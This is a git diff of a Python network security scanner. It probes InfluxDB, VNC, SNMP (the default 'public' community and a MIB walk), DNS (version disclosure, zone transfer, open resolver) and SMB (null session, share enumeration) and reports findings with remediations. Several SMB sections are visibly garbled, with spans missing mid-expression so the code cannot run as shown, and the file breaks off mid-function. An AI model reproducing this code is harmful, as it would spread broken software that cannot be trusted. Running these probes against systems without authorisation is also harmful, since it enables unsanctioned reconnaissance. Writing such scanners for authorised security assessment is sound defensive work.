severity=Severity.CRITICAL if user_dbs else Severity.HIGH, + title=f"InfluxDB unauthenticated access ({len(db_names)} databases)", + description=f"SHOW DATABASES succeeded without credentials. " + f"{'User databases: ' + ', '.join(user_dbs[:5]) if user_dbs else 'Only internal databases found.'}", + evidence=f"Databases: {', '.join(db_names[:10])}", + remediation="Enable InfluxDB authentication in the configuration ([http] auth-enabled = true).", + owasp_id="A07:2021", + cwe_id="CWE-287", + confidence="certain", + )) + elif results and results[0].get("error"): + # Auth required — good + findings.append(Finding( + severity=Severity.INFO, + title="InfluxDB authentication enforced", + description="SHOW DATABASES rejected without credentials.", + evidence=f"Error: {results[0]['error'][:80]}", + confidence="certain", + )) + except Exception: + pass + + # 3. Debug endpoint exposure + try: + resp = requests.get(f"{base_url}/debug/vars", timeout=3) + if resp.ok and "memstats" in resp.text: + findings.append(Finding( + severity=Severity.MEDIUM, + title="InfluxDB debug endpoint exposed (/debug/vars)", + description="Go runtime debug variables accessible, leaking memory stats and internal state.", + evidence=f"GET /debug/vars returned {resp.status_code}", + remediation="Disable or restrict access to debug endpoints.", + owasp_id="A05:2021", + cwe_id="CWE-200", + confidence="certain", + )) + except Exception: + pass + + if not findings: + findings.append(Finding(Severity.INFO, "InfluxDB probe clean", "No issues detected.")) + return probe_result(raw_data=raw, findings=findings) diff --git a/extensions/business/cybersec/red_mesh/worker/service/infrastructure.py b/extensions/business/cybersec/red_mesh/worker/service/infrastructure.py new file mode 100644 index 00000000..7a39f359 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/worker/service/infrastructure.py @@ -0,0 +1,2024 @@ +import random +import re as _re +import socket +import struct + +import requests + +from ...findings import Finding, Severity, probe_result, probe_error +from ...cve_db import check_cves +from ._base import _ServiceProbeBase + + +class _ServiceInfraMixin(_ServiceProbeBase): + """RDP, VNC, SNMP, DNS, SMB, WINS, Modbus and Elasticsearch probes.""" + + def _service_info_rdp(self, target, port): # default port: 3389 + """ + Verify reachability of RDP services without full negotiation. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + findings = [] + raw = {"banner": None} + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(2) + sock.connect((target, port)) + raw["banner"] = "RDP service open" + findings.append(Finding( + severity=Severity.INFO, + title="RDP service detected", + description=f"RDP port {port} is open on {target}, no further enumeration performed.", + evidence=f"TCP connect to {target}:{port} succeeded.", + confidence="certain", + )) + sock.close() + except Exception as e: + return probe_error(target, port, "RDP", e) + return probe_result(raw_data=raw, findings=findings) + + def _service_info_vnc(self, target, port): # default port: 5900 + """ + VNC handshake: read version banner, negotiate security types. + + Security types: + 1 (None) → CRITICAL: unauthenticated desktop access + 2 (VNC Auth) → MEDIUM: DES-based, max 8-char password + 19 (VeNCrypt) → INFO: TLS-secured + Other → LOW: unknown auth type + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + findings = [] + raw = {"banner": None, "security_types": []} + + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + + # Read server banner (e.g. "RFB 003.008\n") + banner = sock.recv(12).decode('ascii', errors='ignore').strip() + raw["banner"] = banner + + if not banner.startswith("RFB"): + findings.append(Finding( + severity=Severity.MEDIUM, + title=f"VNC service detected (non-standard banner: {banner[:30]})", + description="VNC port open but banner is non-standard.", + evidence=f"Banner: {banner}", + remediation="Restrict VNC access to trusted networks or use SSH tunneling.", + confidence="tentative", + )) + sock.close() + return probe_result(raw_data=raw, findings=findings) + + # Echo version back to negotiate + sock.sendall(banner.encode('ascii') + b"\n") + + # Read security type list + sec_data = sock.recv(64) + sec_types = [] + if len(sec_data) >= 1: + num_types = sec_data[0] + if num_types > 0 and len(sec_data) >= 1 + num_types: + sec_types = list(sec_data[1:1 + num_types]) + raw["security_types"] = sec_types + sock.close() + + _VNC_TYPE_NAMES = {1: "None", 2: "VNC Auth", 19: "VeNCrypt", 16: "Tight"} + type_labels = [f"{t}({_VNC_TYPE_NAMES.get(t, 'unknown')})" for t in sec_types] + raw["security_type_labels"] = type_labels + + if 1 in sec_types: + findings.append(Finding( + severity=Severity.CRITICAL, + title="VNC unauthenticated access (security type None)", + description=f"VNC on {target}:{port} allows connections without authentication.", + evidence=f"Banner: {banner}, security types: {type_labels}", + remediation="Disable security type None and require VNC Auth or VeNCrypt.", + owasp_id="A07:2021", + cwe_id="CWE-287", + confidence="certain", + )) + if 2 in sec_types: + findings.append(Finding( + severity=Severity.MEDIUM, + title="VNC password auth (DES-based, max 8 chars)", + description=f"VNC Auth uses DES encryption with a maximum 8-character password.", + evidence=f"Banner: {banner}, security types: {type_labels}", + remediation="Use VeNCrypt (TLS) or SSH tunneling instead of plain VNC Auth.", + owasp_id="A02:2021", + cwe_id="CWE-326", + confidence="certain", + )) + if 19 in sec_types: + findings.append(Finding( + severity=Severity.INFO, + title="VNC VeNCrypt (TLS-secured)", + description="VeNCrypt provides TLS-secured VNC connections.", + evidence=f"Banner: {banner}, security types: {type_labels}", + confidence="certain", + )) + if not sec_types: + findings.append(Finding( + severity=Severity.MEDIUM, + title=f"VNC service exposed: {banner}", + description="VNC protocol banner detected but security types could not be parsed.", + evidence=f"Banner: {banner}", + remediation="Restrict VNC access to trusted networks.", + confidence="firm", + )) + + except Exception as e: + return probe_error(target, port, "VNC", e) + + return probe_result(raw_data=raw, findings=findings) + + + def _service_info_snmp(self, target, port): # default port: 161 + """ + Attempt SNMP community string disclosure using 'public'. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + findings = [] + raw = {"banner": None} + sock = None + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + sock.settimeout(2) + packet = bytes.fromhex( + "302e020103300702010304067075626c6963a019020405f5e10002010002010030100406082b060102010101000500" + ) + sock.sendto(packet, (target, port)) + data, _ = sock.recvfrom(512) + readable = ''.join(chr(b) if 32 <= b < 127 else '.' for b in data) + if 'public' in readable.lower(): + raw["banner"] = readable.strip()[:120] + findings.append(Finding( + severity=Severity.HIGH, + title="SNMP default community string 'public' accepted", + description="SNMP agent responds to the default 'public' community string, " + "allowing unauthenticated read access to device configuration and network data.", + evidence=f"Response: {readable.strip()[:80]}", + remediation="Change the community string from 'public' to a strong value; migrate to SNMPv3.", + owasp_id="A07:2021", + cwe_id="CWE-798", + confidence="certain", + )) + # Walk system MIB for additional intel + mib_result = self._snmp_walk_system_mib(target, port) + if mib_result: + sys_info = mib_result.get("system", {}) + raw.update(sys_info) + findings.extend(mib_result.get("findings", [])) + else: + raw["banner"] = readable.strip()[:120] + findings.append(Finding( + severity=Severity.INFO, + title="SNMP service responded", + description=f"SNMP agent on {target}:{port} responded but did not accept 'public' community.", + evidence=f"Response: {readable.strip()[:80]}", + confidence="firm", + )) + except socket.timeout: + return probe_error(target, port, "SNMP", Exception("timed out")) + except Exception as e: + return probe_error(target, port, "SNMP", e) + finally: + if sock is not None: + sock.close() + return probe_result(raw_data=raw, findings=findings) + + # -- SNMP MIB walk helpers ------------------------------------------------ + + _ICS_KEYWORDS = frozenset({ + "siemens", "simatic", "schneider", "allen-bradley", "honeywell", + "abb", "modicon", "rockwell", "yokogawa", "emerson", "ge fanuc", + }) + + def _is_ics_indicator(self, text): + lower = text.lower() + return any(kw in lower for kw in self._ICS_KEYWORDS) + + @staticmethod + def _snmp_encode_oid(oid_str): + parts = [int(p) for p in oid_str.split(".")] + body = bytes([40 * parts[0] + parts[1]]) + for v in parts[2:]: + if v < 128: + body += bytes([v]) + else: + chunks = [] + chunks.append(v & 0x7F) + v >>= 7 + while v: + chunks.append(0x80 | (v & 0x7F)) + v >>= 7 + body += bytes(reversed(chunks)) + return body + + def _snmp_build_getnext(self, community, oid_str, request_id=1): + oid_body = self._snmp_encode_oid(oid_str) + oid_tlv = bytes([0x06, len(oid_body)]) + oid_body + varbind = bytes([0x30, len(oid_tlv) + 2]) + oid_tlv + b"\x05\x00" + varbind_seq = bytes([0x30, len(varbind)]) + varbind + req_id = bytes([0x02, 0x01, request_id & 0xFF]) + err_status = b"\x02\x01\x00" + err_index = b"\x02\x01\x00" + pdu_body = req_id + err_status + err_index + varbind_seq + pdu = bytes([0xA1, len(pdu_body)]) + pdu_body + version = b"\x02\x01\x00" + comm = bytes([0x04, len(community)]) + community.encode() + inner = version + comm + pdu + return bytes([0x30, len(inner)]) + inner + + @staticmethod + def _snmp_parse_response(data): + try: + pos = 0 + if data[pos] != 0x30: + return None, None + pos += 2 # skip SEQUENCE tag + length + # skip version + if data[pos] != 0x02: + return None, None + pos += 2 + data[pos + 1] + # skip community + if data[pos] != 0x04: + return None, None + pos += 2 + data[pos + 1] + # response PDU (0xA2) + if data[pos] != 0xA2: + return None, None + pos += 2 + # skip request-id, error-status, error-index (3 integers) + for _ in range(3): + pos += 2 + data[pos + 1] + # varbind list SEQUENCE + pos += 2 # skip SEQUENCE tag + length + # first varbind SEQUENCE + pos += 2 # skip SEQUENCE tag + length + # OID + if data[pos] != 0x06: + return None, None + oid_len = data[pos + 1] + oid_bytes = data[pos + 2: pos + 2 + oid_len] + # decode OID + parts = [str(oid_bytes[0] // 40), str(oid_bytes[0] % 40)] + i = 1 + while i < len(oid_bytes): + if oid_bytes[i] < 128: + parts.append(str(oid_bytes[i])) + i += 1 + else: + val = 0 + while i < len(oid_bytes) and oid_bytes[i] & 0x80: + val = (val << 7) | (oid_bytes[i] & 0x7F) + i += 1 + if i < len(oid_bytes): + val = (val << 7) | oid_bytes[i] + i += 1 + parts.append(str(val)) + oid_str = ".".join(parts) + pos += 2 + oid_len + # value + val_tag = data[pos] + val_len = data[pos + 1] + val_raw = data[pos + 2: pos + 2 + val_len] + if val_tag == 0x04: # OCTET STRING + value = val_raw.decode("utf-8", errors="replace") + elif val_tag == 0x02: # INTEGER + value = str(int.from_bytes(val_raw, "big", signed=True)) + elif val_tag == 0x43: # TimeTicks + value = str(int.from_bytes(val_raw, "big")) + elif val_tag == 0x40: # IpAddress (APPLICATION 0) + if len(val_raw) == 4: + value = ".".join(str(b) for b in val_raw) + else: + value = val_raw.hex() + else: + value = val_raw.hex() + return oid_str, value + except Exception: + return None, None + + _SYSTEM_OID_NAMES = { + "1.3.6.1.2.1.1.1": "sysDescr", + "1.3.6.1.2.1.1.3": "sysUpTime", + "1.3.6.1.2.1.1.4": "sysContact", + "1.3.6.1.2.1.1.5": "sysName", + "1.3.6.1.2.1.1.6": "sysLocation", + } + + def _snmp_walk_system_mib(self, target, port): + import ipaddress as _ipaddress + system = {} + walk_findings = [] + sock = None + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + sock.settimeout(2) + + def _walk(prefix): + oid = prefix + results = [] + for _ in range(20): + pkt = self._snmp_build_getnext("public", oid) + sock.sendto(pkt, (target, port)) + try: + resp, _ = sock.recvfrom(1024) + except socket.timeout: + break + resp_oid, resp_val = self._snmp_parse_response(resp) + if resp_oid is None or not resp_oid.startswith(prefix + "."): + break + results.append((resp_oid, resp_val)) + oid = resp_oid + return results + + # Walk system MIB subtree + for resp_oid, resp_val in _walk("1.3.6.1.2.1.1"): + base = ".".join(resp_oid.split(".")[:8]) + name = self._SYSTEM_OID_NAMES.get(base) + if name: + system[name] = resp_val + + sys_descr = system.get("sysDescr", "") + if sys_descr: + self._emit_metadata("os_claims", f"snmp:{port}", sys_descr) + if self._is_ics_indicator(sys_descr): + walk_findings.append(Finding( + severity=Severity.HIGH, + title="SNMP exposes ICS/SCADA device identity", + description=f"sysDescr contains ICS keywords: {sys_descr[:120]}", + evidence=f"sysDescr={sys_descr[:120]}", + remediation="Isolate ICS devices from general network; restrict SNMP access.", + confidence="firm", + )) + + # Walk ipAddrTable for interface IPs + for resp_oid, resp_val in _walk("1.3.6.1.2.1.4.20.1.1"): + try: + addr = _ipaddress.ip_address(resp_val) + except (ValueError, TypeError): + continue + if addr.is_private: + self._emit_metadata("internal_ips", {"ip": str(addr), "source": f"snmp_interface:{port}"}) + walk_findings.append(Finding( + severity=Severity.MEDIUM, + title=f"SNMP leaks internal IP address {addr}", + description="Interface IP from ipAddrTable is RFC1918, revealing internal topology.", + evidence=f"ipAddrEntry={resp_val}", + remediation="Restrict SNMP read access; filter sensitive MIBs.", + confidence="certain", + )) + except Exception: + pass + finally: + if sock is not None: + sock.close() + if not system and not walk_findings: + return None + return {"system": system, "findings": walk_findings} + + def _service_info_dns(self, target, port): # default port: 53 + """ + Query CHAOS TXT version.bind to detect DNS version disclosure. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + findings = [] + raw = {"banner": None, "dns_version": None} + sock = None + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + sock.settimeout(2) + tid = random.randint(0, 0xffff) + header = struct.pack('>HHHHHH', tid, 0x0100, 1, 0, 0, 0) + qname = b'\x07version\x04bind\x00' + question = struct.pack('>HH', 16, 3) + packet = header + qname + question + sock.sendto(packet, (target, port)) + data, _ = sock.recvfrom(512) + + # Parse CHAOS TXT response + parsed = False + if len(data) >= 12 and struct.unpack('>H', data[:2])[0] == tid: + ancount = struct.unpack('>H', data[6:8])[0] + if ancount: + idx = 12 + len(qname) + 4 + if idx < len(data): + if data[idx] & 0xc0 == 0xc0: + idx += 2 + else: + while idx < len(data) and data[idx] != 0: + idx += data[idx] + 1 + idx += 1 + idx += 8 + if idx + 2 <= len(data): + rdlength = struct.unpack('>H', data[idx:idx+2])[0] + idx += 2 + if idx < len(data): + txt_length = data[idx] + txt = data[idx+1:idx+1+txt_length].decode('utf-8', errors='ignore') + if txt: + raw["dns_version"] = txt + raw["banner"] = f"DNS version: {txt}" + findings.append(Finding( + severity=Severity.LOW, + title=f"DNS version disclosure: {txt}", + description=f"CHAOS TXT version.bind query reveals DNS software version.", + evidence=f"version.bind TXT: {txt}", + remediation="Disable version.bind responses in the DNS server configuration.", + owasp_id="A05:2021", + cwe_id="CWE-200", + confidence="certain", + )) + parsed = True + # CVE check — version.bind is BIND-specific + _bind_m = _re.search(r'(\d+\.\d+(?:\.\d+)*)', txt) + if _bind_m: + findings += check_cves("bind", _bind_m.group(1)) + + # Fallback: check raw data for version keywords + if not parsed: + readable = ''.join(chr(b) if 32 <= b < 127 else '.' for b in data) + if 'bind' in readable.lower() or 'version' in readable.lower(): + raw["banner"] = readable.strip()[:80] + findings.append(Finding( + severity=Severity.LOW, + title="DNS version disclosure via CHAOS TXT", + description=f"CHAOS TXT response on {target}:{port} contains version keywords.", + evidence=f"Response contains: {readable.strip()[:80]}", + remediation="Disable version.bind responses in the DNS server configuration.", + owasp_id="A05:2021", + cwe_id="CWE-200", + confidence="firm", + )) + else: + raw["banner"] = "DNS service responding" + findings.append(Finding( + severity=Severity.INFO, + title="DNS CHAOS TXT query did not disclose version", + description=f"DNS on {target}:{port} responded but did not reveal version.", + confidence="firm", + )) + except socket.timeout: + return probe_error(target, port, "DNS", Exception("CHAOS query timed out")) + except Exception as e: + return probe_error(target, port, "DNS", e) + finally: + if sock is not None: + sock.close() + + # --- DNS zone transfer (AXFR) test --- + axfr_findings = self._dns_test_axfr(target, port) + findings += axfr_findings + + # --- Open recursive resolver test --- + resolver_finding = self._dns_test_open_resolver(target, port) + if resolver_finding: + findings.append(resolver_finding) + + return probe_result(raw_data=raw, findings=findings) + + def _dns_discover_zones(self, target, port): + """Discover zone names the DNS server is authoritative for. + + Strategy: send SOA queries for a set of candidate domains and check + for authoritative (AA-flag) responses. This is far more reliable than + reverse-DNS guessing when the target serves non-obvious zones. + + Returns list of domain strings (may be empty). + """ + candidates = set() + + # 1. Reverse DNS of target → extract domain + try: + import socket as _socket + hostname, _, _ = _socket.gethostbyaddr(target) + parts = hostname.split(".") + if len(parts) >= 2: + candidates.add(".".join(parts[-2:])) + if len(parts) >= 3: + candidates.add(".".join(parts[-3:])) + except Exception: + pass + + # 2. Common pentest / CTF domains + candidates.update(["vulhub.org", "example.com", "test.local"]) + + # 3. Probe each candidate with a SOA query — keep only authoritative hits + authoritative = [] + for domain in list(candidates): + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + sock.settimeout(2) + tid = random.randint(0, 0xffff) + header = struct.pack('>HHHHHH', tid, 0x0100, 1, 0, 0, 0) + qname = b"" + for label in domain.split("."): + qname += bytes([len(label)]) + label.encode() + qname += b"\x00" + question = struct.pack('>HH', 6, 1) # QTYPE=SOA, QCLASS=IN + sock.sendto(header + qname + question, (target, port)) + data, _ = sock.recvfrom(512) + sock.close() + if len(data) >= 12 and struct.unpack('>H', data[:2])[0] == tid: + flags = struct.unpack('>H', data[2:4])[0] + aa = (flags >> 10) & 1 # Authoritative Answer + rcode = flags & 0x0F + ancount = struct.unpack('>H', data[6:8])[0] + if aa and rcode == 0 and ancount > 0: + authoritative.append(domain) + except Exception: + pass + + # Return authoritative zones first, then remaining candidates as fallback + seen = set(authoritative) + result = list(authoritative) + for d in candidates: + if d not in seen: + result.append(d) + return result + + def _dns_test_axfr(self, target, port): + """Attempt DNS zone transfer (AXFR) via TCP. + + Uses SOA-based zone discovery to find authoritative zones before + attempting AXFR, falling back to reverse DNS and common domains. + + Returns list of findings. + """ + findings = [] + + test_domains = self._dns_discover_zones(target, port) + + for domain in test_domains[:4]: # Test at most 4 domains + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + + # Build AXFR query + tid = random.randint(0, 0xffff) + header = struct.pack('>HHHHHH', tid, 0x0100, 1, 0, 0, 0) + # Encode domain name + qname = b"" + for label in domain.split("."): + qname += bytes([len(label)]) + label.encode() + qname += b"\x00" + # QTYPE=252 (AXFR), QCLASS=1 (IN) + question = struct.pack('>HH', 252, 1) + dns_query = header + qname + question + # TCP DNS: 2-byte length prefix + sock.sendall(struct.pack(">H", len(dns_query)) + dns_query) + + # Read response + resp_len_bytes = sock.recv(2) + if len(resp_len_bytes) < 2: + sock.close() + continue + resp_len = struct.unpack(">H", resp_len_bytes)[0] + resp_data = b"" + while len(resp_data) < resp_len: + chunk = sock.recv(resp_len - len(resp_data)) + if not chunk: + break + resp_data += chunk + sock.close() + + # Parse: check if we got answers (ancount > 0) and no error (rcode = 0) + if len(resp_data) >= 12: + resp_tid = struct.unpack(">H", resp_data[0:2])[0] + flags = struct.unpack(">H", resp_data[2:4])[0] + rcode = flags & 0x0F + ancount = struct.unpack(">H", resp_data[6:8])[0] + + if resp_tid == tid and rcode == 0 and ancount > 0: + findings.append(Finding( + severity=Severity.HIGH, + title=f"DNS zone transfer (AXFR) allowed for {domain}", + description=f"DNS on {target}:{port} permits zone transfers for '{domain}'. " + "This leaks all DNS records — hostnames, IPs, mail servers, internal infrastructure.", + evidence=f"AXFR query returned {ancount} answer records for {domain}.", + remediation="Restrict zone transfers to authorized secondary nameservers only (allow-transfer).", + owasp_id="A01:2021", + cwe_id="CWE-200", + confidence="certain", + )) + break # One confirmed AXFR is enough + except Exception: + continue + + return findings + + def _dns_test_open_resolver(self, target, port): + """Test if DNS server acts as an open recursive resolver. + + Returns Finding or None. + """ + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + sock.settimeout(2) + tid = random.randint(0, 0xffff) + # Standard recursive query for example.com A record + header = struct.pack('>HHHHHH', tid, 0x0100, 1, 0, 0, 0) # RD=1 + qname = b'\x07example\x03com\x00' + question = struct.pack('>HH', 1, 1) # QTYPE=A, QCLASS=IN + packet = header + qname + question + sock.sendto(packet, (target, port)) + data, _ = sock.recvfrom(512) + sock.close() + + if len(data) >= 12 and struct.unpack('>H', data[:2])[0] == tid: + flags = struct.unpack('>H', data[2:4])[0] + qr = (flags >> 15) & 1 + rcode = flags & 0x0F + ancount = struct.unpack('>H', data[6:8])[0] + ra = (flags >> 7) & 1 # Recursion Available + + if qr == 1 and rcode == 0 and ancount > 0 and ra == 1: + return Finding( + severity=Severity.MEDIUM, + title="DNS open recursive resolver detected", + description=f"DNS on {target}:{port} recursively resolves queries for external domains. " + "Open resolvers can be abused for DNS amplification DDoS attacks.", + evidence=f"Recursive query for example.com returned {ancount} answers with RA flag set.", + remediation="Restrict recursive queries to authorized clients only (allow-recursion).", + owasp_id="A05:2021", + cwe_id="CWE-406", + confidence="certain", + ) + except Exception: + pass + return None + + def _service_info_smb(self, target, port): # default port: 445 + """ + Probe SMB services: dialect negotiation, version extraction, CVE matching, + null session test, and security flag analysis. + + Checks performed: + + 1. SMB negotiate — determine supported dialect (SMBv1/v2/v3). + 2. Version extraction — parse Samba/Windows version from NativeOS/NativeLanMan. + 3. Security flags — check signing requirements. + 4. Null session — attempt anonymous IPC$ access. + 5. CVE matching — run check_cves on extracted Samba version. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + findings = [] + raw = { + "banner": None, "dialect": None, "server_os": None, + "server_domain": None, "samba_version": None, + "signing_required": None, "smbv1_supported": False, + } + + # --- 1. SMBv1 Negotiate --- + # Build a proper SMBv1 Negotiate Protocol Request with NT LM 0.12 dialect + dialects = b"\x02NT LM 0.12\x00\x02SMB 2.002\x00\x02SMB 2.???\x00" + smb_header = bytearray(32) + smb_header[0:4] = b"\xffSMB" # Protocol ID + smb_header[4] = 0x72 # Command: Negotiate + # Flags: 0x18 (case-sensitive, canonicalized paths) + smb_header[13] = 0x18 + # Flags2: unicode + NT status + long names + struct.pack_into("I", len(smb_payload)) + netbios_header = b"\x00" + netbios_header[1:] # force type=0 + + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(4) + sock.connect((target, port)) + sock.sendall(netbios_header + smb_payload) + + # Read NetBIOS header (4 bytes) + full response + resp_hdr = self._smb_recv_exact(sock, 4) + if not resp_hdr: + sock.close() + findings.append(Finding( + severity=Severity.INFO, + title="SMB port open but no negotiation response", + description=f"Port {port} is open but SMB did not respond to negotiation.", + confidence="tentative", + )) + return probe_result(raw_data=raw, findings=findings) + + resp_len = struct.unpack(">I", b"\x00" + resp_hdr[1:4])[0] + resp_data = self._smb_recv_exact(sock, min(resp_len, 4096)) + sock.close() + + if not resp_data or len(resp_data) < 36: + raw["banner"] = "SMB response too short" + findings.append(Finding( + severity=Severity.MEDIUM, + title="SMB service responded to negotiation probe", + description=f"SMB on {target}:{port} accepts negotiation requests.", + evidence=f"Response: {(resp_data or b'').hex()[:48]}", + remediation="Restrict SMB access to trusted networks; disable SMBv1.", + owasp_id="A01:2021", + cwe_id="CWE-284", + confidence="certain", + )) + return probe_result(raw_data=raw, findings=findings) + + # Check if SMBv1 or SMBv2 response + protocol_id = resp_data[0:4] + + if protocol_id == b"\xffSMB": + # --- SMBv1 response --- + raw["smbv1_supported"] = True + raw["banner"] = "SMBv1 negotiation response received" + + # Parse negotiate response body (after 32-byte header) + if len(resp_data) >= 37: + word_count = resp_data[32] + if word_count >= 17 and len(resp_data) >= 32 + 1 + 34: + words_start = 33 + dialect_idx = struct.unpack_from("= 17 and len(resp_data) >= words_start + 2 + 22 + 2: + sec_blob_len = struct.unpack_from("= 1: + raw["server_domain"] = parts[0] + if len(parts) >= 2: + raw["server_name"] = parts[1] + except Exception: + pass + + # SMBv1 is a security concern + findings.append(Finding( + severity=Severity.MEDIUM, + title="SMBv1 protocol supported (legacy, attack surface for MS17-010)", + description=f"SMB on {target}:{port} supports SMBv1, which is vulnerable to " + "EternalBlue (MS17-010) and other SMBv1-specific attacks.", + evidence=f"Negotiated dialect: {raw['dialect']}, SMBv1 response received.", + remediation="Disable SMBv1 on the server (e.g., 'server min protocol = SMB2' in smb.conf).", + owasp_id="A06:2021", + cwe_id="CWE-757", + confidence="certain", + )) + + elif protocol_id == b"\xfeSMB": + # --- SMBv2/3 response --- + raw["banner"] = "SMBv2 negotiation response received" + if len(resp_data) >= 72: + smb2_dialect = struct.unpack_from(" Session Setup (null) -> Tree Connect IPC$ -> + Open \\srvsvc pipe -> DCE/RPC Bind -> NetShareEnumAll -> parse results. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + SMB port (typically 445). + + Returns + ------- + list[dict] + Each dict has keys ``name`` (str), ``type`` (int), ``comment`` (str). + Returns empty list on any failure. + """ + sock = None + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(4) + sock.connect((target, port)) + + def _send_smb(payload): + nb_hdr = b"\x00" + struct.pack(">I", len(payload))[1:] + sock.sendall(nb_hdr + payload) + + def _recv_smb(): + resp_hdr = self._smb_recv_exact(sock, 4) + if not resp_hdr: + return None + resp_len = struct.unpack(">I", b"\x00" + resp_hdr[1:4])[0] + return self._smb_recv_exact(sock, min(resp_len, 65536)) + + # ---- 1. Negotiate (NT LM 0.12) ---- + dialects = b"\x02NT LM 0.12\x00" + smb_hdr = bytearray(32) + smb_hdr[0:4] = b"\xffSMB" + smb_hdr[4] = 0x72 # Negotiate + smb_hdr[13] = 0x18 + struct.pack_into(" len(enum_resp): + data_len = len(enum_resp) - data_off + if data_off >= len(enum_resp) or data_len < 24: + return [] + + dce_data = enum_resp[data_off:data_off + data_len] + + # DCE/RPC response header is 24 bytes, then stub data + if len(dce_data) < 24: + return [] + dce_stub = dce_data[24:] + + return self._parse_netshareenumall_response(dce_stub) + + except Exception: + return [] + finally: + if sock: + try: + sock.close() + except Exception: + pass + + @staticmethod + def _parse_netshareenumall_response(stub): + """Parse NetShareEnumAll DCE/RPC stub response into share list. + + Parameters + ---------- + stub : bytes + DCE/RPC stub data (after the 24-byte response header). + + Returns + ------- + list[dict] + Each dict: {"name": str, "type": int, "comment": str}. + """ + shares = [] + try: + if len(stub) < 20: + return [] + + # Response stub layout: + # [4] info_level + # [4] switch_value + # [4] referent pointer for SHARE_INFO_1_CONTAINER + # [4] entries_read + # [4] referent pointer for array + # Then for each entry: [4] name_ptr, [4] type, [4] comment_ptr + # Then the actual strings (NDR conformant arrays) + + offset = 0 + offset += 4 # info_level + offset += 4 # switch_value + offset += 4 # referent pointer + if offset + 4 > len(stub): + return [] + entries_read = struct.unpack_from(" 500: + return [] + + offset += 4 # array referent pointer + offset += 4 # max count (NDR array header) + + # Read the fixed-size entries: name_ptr(4) + type(4) + comment_ptr(4) each + entry_records = [] + for _ in range(entries_read): + if offset + 12 > len(stub): + break + name_ptr = struct.unpack_from(" len(data): + return "", off + max_count = struct.unpack_from(" len(data): + s = data[off:].decode("utf-16-le", errors="ignore").rstrip("\x00") + return s, len(data) + s = data[off:off + byte_len].decode("utf-16-le", errors="ignore").rstrip("\x00") + off += byte_len + # Align to 4-byte boundary + if off % 4: + off += 4 - (off % 4) + return s, off + + for name_ptr, share_type, comment_ptr in entry_records: + name, offset = read_ndr_string(stub, offset) + comment, offset = read_ndr_string(stub, offset) + if name: + shares.append({ + "name": name, + "type": share_type, + "comment": comment, + }) + + except Exception: + pass + return shares + + def _smb_try_null_session(self, target, port): + """Attempt SMBv1 null session to extract Samba version from SessionSetup response. + + Returns + ------- + str or None + Extracted Samba version string (e.g. '4.6.3'), or None. + """ + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(3) + sock.connect((target, port)) + + # --- Negotiate --- + dialects = b"\x02NT LM 0.12\x00" + smb_header = bytearray(32) + smb_header[0:4] = b"\xffSMB" + smb_header[4] = 0x72 # Negotiate + smb_header[13] = 0x18 + struct.pack_into("I", len(payload))[1:] + sock.sendall(nb_hdr + payload) + + # Read negotiate response + resp_hdr = self._smb_recv_exact(sock, 4) + if not resp_hdr: + sock.close() + return None + resp_len = struct.unpack(">I", b"\x00" + resp_hdr[1:4])[0] + self._smb_recv_exact(sock, min(resp_len, 4096)) + + # --- Session Setup AndX (null session) --- + smb_header2 = bytearray(32) + smb_header2[0:4] = b"\xffSMB" + smb_header2[4] = 0x73 # Session Setup AndX + smb_header2[13] = 0x18 + struct.pack_into("I", len(payload2))[1:] + sock.sendall(nb_hdr2 + payload2) + + # Read session setup response + resp_hdr2 = self._smb_recv_exact(sock, 4) + if not resp_hdr2: + sock.close() + return None + resp_len2 = struct.unpack(">I", b"\x00" + resp_hdr2[1:4])[0] + resp_data2 = self._smb_recv_exact(sock, min(resp_len2, 4096)) + sock.close() + + if not resp_data2: + return None + + # Extract NativeOS string — contains "Samba x.y.z" or "Windows ..." + # Search the response bytes for "Samba" followed by a version + resp_text = resp_data2.decode("utf-8", errors="ignore") + samba_match = _re.search(r'Samba\s+(\d+\.\d+(?:\.\d+)?)', resp_text) + if samba_match: + return samba_match.group(1) + + # Also try UTF-16-LE decoding + resp_text_u16 = resp_data2.decode("utf-16-le", errors="ignore") + samba_match_u16 = _re.search(r'Samba\s+(\d+\.\d+(?:\.\d+)?)', resp_text_u16) + if samba_match_u16: + return samba_match_u16.group(1) + + except Exception: + pass + return None + + + # NetBIOS name suffix → human-readable type + _NBNS_SUFFIX_TYPES = { + 0x00: "Workstation", + 0x03: "Messenger (logged-in user)", + 0x20: "File Server (SMB sharing)", + 0x1C: "Domain Controller", + 0x1B: "Domain Master Browser", + 0x1E: "Browser Election Service", + } + + def _service_info_wins(self, target, port): # ports: 42 (WINS/TCP), 137 (NBNS/UDP) + """ + Probe WINS / NetBIOS Name Service for name enumeration and service detection. + + Port 42 (TCP): WINS replication — sends MS-WINSRA Association Start Request + to fingerprint the service and extract NBNS version. Also fires a UDP + side-probe to port 137 for NetBIOS name enumeration. + Port 137 (UDP): NBNS — sends wildcard node-status query (RFC 1002) to + enumerate registered NetBIOS names. + + Parameters + ---------- + target : str + Hostname or IP address. + port : int + Port being probed. + + Returns + ------- + dict + Structured findings. + """ + findings = [] + raw 